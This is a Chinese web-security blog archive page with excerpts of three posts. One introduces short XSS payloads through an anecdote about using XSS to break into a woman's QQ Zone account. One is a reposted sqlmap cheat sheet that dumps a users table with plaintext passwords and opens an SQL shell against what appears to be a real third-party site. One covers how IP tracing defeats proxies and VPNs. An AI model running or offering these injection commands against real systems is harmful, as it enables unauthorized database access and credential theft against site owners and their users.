分类目录归档:Web安全

Short XSS

文章作者:xsscript(原网名Crackkay)

0x00 背景

关键时候长度不够怎么办?

在实际的情况中如果你不够长怎么办呢?看医生?吃药?做手术?。。。。。。。。。。。。。。算了,既然自身硬件不足,那么就把缺点变优点吧。熟话说:小是小威力好。

熟话说的好,要能长能短,收放自如。在很多的情况中,我们构造的语句是被限制在一定的字符数内。所以这个就是考验你能短的时候能不能短,能长的时候能不能长的时候到了。

0x01 现实中的悲剧

这是一个活生生的悲剧,一个平台上面,一个二逼朋友有妹子的平台账号,但是二逼朋友想进妹子的QQ空间,用平台的备注插QQ-XSS代码,但是因为限制的字符太短,最终抱头痛哭。于是就有了下图所发生:

1

继续阅读

Sqlmap注入语句备注

转载自:mickey

$ python sqlmap.py -u “http://ww.victim.com/get_int.php?id=1”–union-use –
dump -T users -D public -v 0

web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
Database: public
Table: users
[4 entries]
+—-+———— +———-+
| id | password | username |
+—-+———— +———-+
| 1 | blissett | luther |
| 2 | nameisnull | NULL |
| 3 | bunny | fluffy |
| 4 | ming | wu |

=======================================

这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //执行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更详细的信息

继续阅读

如何追踪到你的IP

如何追踪你的IP

转载于:网络

1.不用代理

网民发帖流程:

发帖人 → ISP → 服务器托管商 → 服务器

网警追踪流程:

网监 → 服务器IP → 发帖人IP → 发帖人ISP → 档案

爆菊几率:100%

2.只用1层私人VPN

网民发帖流程:

发帖人 → ISP → VPN → 服务器托管商 → 服务器

网警追踪流程:

网监 → 服务器IP → VPN的IP → 路由日志 → 链接者IP → 链接者ISP → 办网档案

爆菊几率:100%

继续阅读